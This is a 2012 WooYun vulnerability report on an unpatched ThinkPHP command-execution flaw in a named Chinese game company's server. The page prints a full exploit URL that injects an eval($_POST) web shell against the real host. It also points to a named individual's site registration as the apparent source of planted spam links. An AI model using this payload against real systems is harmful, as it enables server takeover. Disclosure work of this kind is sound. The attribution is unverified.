当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08584

漏洞标题:国内某知名网游服务器严重隐患。。

相关厂商:华夏飞讯

漏洞作者: zeracker

提交时间:2012-06-21 17:02

修复时间:2012-08-05 17:03

公开时间:2012-08-05 17:03

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国内某知名网游服务器严重隐患。。
已被挂黑链。
显然是没有一个安全人员啊。
安全体系有问题!
不多说,命令执行。

详细说明:

华夏飞讯
北京华夏飞讯科技有限公司 China Cyber Games(以下简称:华夏飞讯 CCG)是大中华地区技术研发实力最强的互联网数字内容提供商。拥有跨平台云服务技术,3D/2D大型游戏引擎,动作、语音识别技术等数十项核心技术的自主知识产权。华夏飞讯的企业使命是成为全球第一的互联网内容提供商,改变人类的娱乐生活方式。
http://sg.hxfx.cn/index.php/module/action/param1/${@eval%28$_POST[301]%29}
囧。还是thinkphp的老洞了,你们都没人管理的。遗憾。
后续能做什么,我就不说了。
黑链地址http://www.vmvmvm.com 以前好像是开黑站的,6月份才上线的电影站。
ICP备案主体信息
备案/许可证号: 苏ICP备09051387号 审核通过时间: 2011-07-04
主办单位名称: 常州首码计算机有限公司 主办单位性质: 企业



ICP备案网站信息
网站名称: 常州首码计算机有限公司 网站首页网址: www.czvision.com.cn
网站负责人姓名: 陈山 网站域名: vmvmvm.com WHOIS IP
czvision.com.cn WHOIS IP
苏ICP备09051387号 WHOIS IP
网站备案/许可证号: 苏ICP备09051387号-1 网站前置审批项:

具体是谁,这个就多说了

漏洞证明:













修复方案:

加强安全体系,及时打补丁,
建议来乌云上收个白帽子回去。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝